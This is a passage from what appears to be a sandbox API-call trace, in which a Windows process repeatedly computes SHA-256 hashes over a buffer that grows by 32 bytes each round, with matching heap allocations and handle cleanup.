	[0214.449] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb30
	[0214.449] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbb30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbb30, pdwDataLen=0x128ba4) returned 1
	[0214.449] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.449] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.449] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.449] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.449] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0214.449] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cba90
	[0214.449] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cba90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cba90, pdwDataLen=0x128ba4) returned 1
	[0214.449] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.449] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.449] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.450] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.450] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0214.450] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbae0
	[0214.450] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbae0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbae0, pdwDataLen=0x128ba4) returned 1
	[0214.450] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.450] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.450] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.450] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.450] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0214.450] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733340
	[0214.450] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733340, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733340, pdwDataLen=0x128ba4) returned 1
	[0214.451] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.451] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.451] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.451] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.451] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0214.451] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733368
	[0214.451] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733368, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733368, pdwDataLen=0x128ba4) returned 1
	[0214.451] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.451] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.451] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.452] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.452] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0214.452] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733390
	[0214.452] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733390, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733390, pdwDataLen=0x128ba4) returned 1
	[0214.452] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.452] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.452] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.452] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.452] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0214.452] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27333b8
	[0214.452] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27333b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27333b8, pdwDataLen=0x128ba4) returned 1
	[0214.452] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.452] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.452] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.453] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.453] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0214.453] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27333e0
	[0214.453] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27333e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27333e0, pdwDataLen=0x128ba4) returned 1
	[0214.453] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.453] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.453] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.453] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.453] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0214.453] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733408
	[0214.453] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733408, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733408, pdwDataLen=0x128ba4) returned 1
	[0214.453] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.453] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.453] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.454] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.454] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0214.454] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733430
	[0214.454] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733430, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733430, pdwDataLen=0x128ba4) returned 1
	[0214.454] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.454] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.454] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.455] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.455] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0214.455] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733458
	[0214.455] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733458, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733458, pdwDataLen=0x128ba4) returned 1
	[0214.455] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.455] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.455] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.455] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.455] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0214.455] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733480
	[0214.455] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733480, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733480, pdwDataLen=0x128ba4) returned 1
	[0214.455] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.455] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.455] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.456] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.456] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0214.456] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27334a8
	[0214.456] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27334a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27334a8, pdwDataLen=0x128ba4) returned 1
	[0214.456] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.456] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.456] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.456] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.456] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0214.456] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27334d0
	[0214.456] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27334d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27334d0, pdwDataLen=0x128ba4) returned 1
	[0214.456] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.456] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.456] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.457] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.457] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0214.457] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27334f8
	[0214.457] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27334f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27334f8, pdwDataLen=0x128ba4) returned 1
	[0214.457] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.457] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.457] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.457] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.457] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0214.457] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733520
	[0214.457] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733520, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733520, pdwDataLen=0x128ba4) returned 1
	[0214.457] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.457] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.457] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.458] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.458] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0214.458] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733548
	[0214.458] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733548, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733548, pdwDataLen=0x128ba4) returned 1
	[0214.458] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.458] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.458] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.458] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.458] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0214.458] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733570
	[0214.458] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733570, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733570, pdwDataLen=0x128ba4) returned 1
	[0214.458] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.458] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.459] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.459] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.459] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0214.459] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733598
	[0214.459] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733598, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733598, pdwDataLen=0x128ba4) returned 1
	[0214.459] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.459] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.459] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.459] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.459] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0214.460] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27335c0
	[0214.460] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27335c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27335c0, pdwDataLen=0x128ba4) returned 1
	[0214.460] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.460] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.460] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.460] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.460] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0214.460] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27335e8
	[0214.460] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27335e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27335e8, pdwDataLen=0x128ba4) returned 1
	[0214.460] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.460] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.460] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.461] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.461] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0214.461] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733610
	[0214.461] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733610, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733610, pdwDataLen=0x128ba4) returned 1
	[0214.461] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.461] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.461] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.461] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.461] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0214.461] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733638
	[0214.461] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733638, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733638, pdwDataLen=0x128ba4) returned 1
	[0214.461] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.461] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.461] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.462] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.462] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0214.462] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733660
	[0214.462] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733660, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733660, pdwDataLen=0x128ba4) returned 1
	[0214.462] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.462] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.462] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.462] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.462] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0214.462] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.462] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733688
	[0214.462] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733688, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733688, pdwDataLen=0x128ba4) returned 1
	[0214.462] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.462] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.462] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.463] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.463] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0214.463] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27336b0
